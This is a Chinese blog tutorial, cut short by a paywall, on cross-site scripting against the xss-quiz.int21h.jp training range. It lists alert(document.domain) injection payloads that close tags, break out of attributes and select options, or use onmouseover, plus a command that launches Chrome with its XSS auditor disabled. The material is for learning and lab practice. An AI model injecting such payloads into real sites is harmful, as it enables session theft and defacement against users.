XSS攻击

最新推荐文章于 2022-11-15 20:36:33 发布
最新推荐文章于 2022-11-15 20:36:33 发布
阅读量381 收藏
点赞数 1
分类专栏: web安全攻防 文章标签: python web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45735361/article/details/104445617
版权
本文详细介绍了XSS攻击的各种类型和利用方法,包括探测过程、闭合标签利用、配置Chrome关闭XSS-Auditor、属性和事件中的XSS、以及各种绕过策略。内容涵盖JavaScript伪协议、HTML表单隐藏参数、CSS和IE特性在XSS攻击中的应用,还提供了Python在16进制和Unicode绕过中的角色。
摘要由CSDN通过智能技术生成

实验环境介绍

地址:https://xss-quiz.int21h.jp/

该网址是一个可用于XSS攻击的靶场

探测XSS过程

  • 1.构造一个不会被识别为恶意代码的字符串提交到页面中
  • 2.使用浏览器审查工具进行代码审查,寻找构造的字符串是否在页面中显示

闭合文本标签利用XSS

简单的payload

<script>alert(document.domain);</script>

闭合标签的payload

"</b><script>alert(document.domain);</script>

配置Chrome关闭XSS-Auditor

https://xss-quiz.int21h.jp/ 利用XSS过程中会出现下图情况。配置Chrome --args --disable-xss-auditor
在这里插入图片描述
在桌面新建一个快捷方式

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --args --disable-xss-auditor

属性中的XSS发现

技巧:ctrl+f 全局搜索输入的内容

闭合引号,尖括号,引入script脚本
payload

123"><script>alert(document.domain);</script>

onmouseover 鼠标悬停弹出

" onmouseover= " alert(document.domain)>

select元素可创建单选或多选菜单

<select name="p2">
    <option>Japan</option>
    <option>Germany</option>
    <option>USA</option>
    <option>United Kingdom</option>
</select>

在select下拉框中输入,闭合标签

Japan</option><script>alert(document.domain);</script>

HTML表单隐藏参数介绍

隐藏域是用来收集或发送信息的不可见元素,对于网页的访

最低0.47元/天 解锁文章
夕麻
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
javascript过滤XSS
05-06
用javascript写的过滤XSS代码,危险代码被转义而不是被删除. 根目录下js-xss-master/dist/test.html是例子.
Java防止xss攻击附相关文件下载
08-25
Java防止XSS攻击的核心策略是确保用户输入的数据在显示到网页上之前被适当地编码、转义或过滤,以防止恶意脚本被执行。XSS(跨站脚本)攻击是由于网页应用程序未能正确处理用户输入的数据,使得攻击者能够注入恶意...
XSS篇——javascript:伪协议
weixin_50464560的博客
05-07 6218
一、前言 今天,遇到一个别人挖的坑,问题是这样的。 做了一个列表页,可以筛选数据,有很多筛条件。主要是有input复选框和<a>标签两种。如图:     其中房价的筛选条件使用<a>标签,代码如下 1 <a href="javascript:;" name="price">150元-300元</a>   用javascript:; 来阻止了a标签跳转链接。 但是,却发现在IE下面点击a标签,居然清除了其他input复选框.
php伪协议xss,filter_var 函数()使用javascript伪协议绕过执行xss
weixin_34480323的博客
04-08 245
escape过滤器来过滤link,而实际上这里的escape过滤器,是用PHP内置函数htmlspecialchars来实现的htmlspecialchars函数定义如下:htmlspecialchars:(PHP 4, PHP 5, PHP 7)功能:将特殊字符转换为 HTML 实体定义:stringhtmlspecialchars( string$string[, i...
关于pdf文件xss攻击问题,配置xssFilter方法
12-21
PDF文件XSS攻击问题主要指的是攻击者通过构造恶意的PDF文档,利用其中的脚本语言功能,尝试在用户的浏览器上执行跨站脚本攻击(XSS)。这种攻击方式可能导致敏感信息泄露、用户权限滥用或其他安全风险。在SpringBoot...
防止XSS攻击解决办法
01-20
防止XSS攻击是保护Web应用安全的重要一环,对于任何Web开发者来说都是必备的知识。 一、XSS攻击类型 XSS攻击主要分为三类:反射型XSS、存储型XSS和DOM型XSS。 1. 反射型XSS:攻击者通过构造恶意链接,诱使用户点击...
【PDF-XSS攻击】Java项目-上传文件-解决PDF文件XSS攻击
最新发布
04-07
PDF-XSS实例文件
预防XSS攻击和SQL注入XssFilter
05-19
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如...
8、XSS 攻击的防御pdf资料
10-15
XSS攻击的核心在于将恶意的JavaScript代码注入到网页中,当用户浏览含有这些脚本的网页时,浏览器会执行这些代码,导致用户受到攻击。 XSS攻击主要发生在用户可以输入数据的地方,如微博、留言板、聊天室等。如果...
XSS攻击 代码演示
05-13
网站xss 攻击 代码示例,包括alert弹框,钓鱼网站截取用户cookie信息等;是学习xss的简单示例。可以下载玩玩看看,示例中的钓鱼网站地址为 演示地址,即本资源中的项目地址。xss也是很简单的,可以学习学习
XSS攻击常识及常见的XSS攻击脚本汇总.pdf
12-26
XSS攻击常识及常见的XSS攻击脚本汇总
XSS攻击实例1
01-11
在本实例"XSS攻击实例1"中,我们将探讨这种攻击的原理、类型以及如何在Asp.net框架下预防。 XSS攻击主要分为三类:反射型XSS、存储型XSS和DOM型XSS。反射型XSS是通过诱使用户点击含有恶意参数的链接,将脚本插入到...
springboot2.x使用Jsoup防XSS攻击的实现
10-15
SpringBoot 2.x 使用 Jsoup 防XSS攻击的实现主要是为了保护应用程序免受跨站脚本(Cross-Site Scripting,简称XSS)的威胁。XSS攻击是一种常见且危害极大的网络安全问题,它允许攻击者在受害者的浏览器上执行恶意...
web安全之xss攻击
weixin_30912051的博客
07-30 157
xss攻击的全称是Cross-Site Scripting (XSS)攻击,是一种注入式攻击。基本的做法是把恶意代码注入到目标网站。由于浏览器在打开目标网站的时候并不知道哪些脚本是恶意的,所以浏览器会无差别执行恶意脚本,从而导致用户信息和一些敏感信息被盗取和泄漏。 xss一般分为两种类型,持久化的xss和非持久化的xss。 持久化xss 下面这个例子演示了攻击者如何通过注入恶意代码去盗取用户...
XSS攻击介绍
xysoul的专栏
04-27 725
什么是XSS XSS(Cross Site Script,又称CSS)跨站脚本攻击,是指攻击者利用站点的安全漏洞往Web页面里插入恶意html代码或JS脚本,当用户浏览该页时,嵌入Web里面的攻击脚本会被执行,达到攻击目的。 因为这种攻击是通过别人的网站脚本漏洞达到攻击的效果,就是说可以隐藏攻击者的身份,因此叫做跨站攻击。 (1)非持久性XSS 最直观的就是构造URL欺骗用户点击,URL中
xss攻击详解
剁椒鱼头没剁椒的博客
11-15 8367
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。
xss-javascript被攻击系列--(一)
ClassicSong的博客
12-18 1445
终于消停了,可以安静写写这些日子的惨痛的经历了。 某天产品A突然喊到,账号被盗了,有关金钱的东西也被盗了,头皮发麻
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值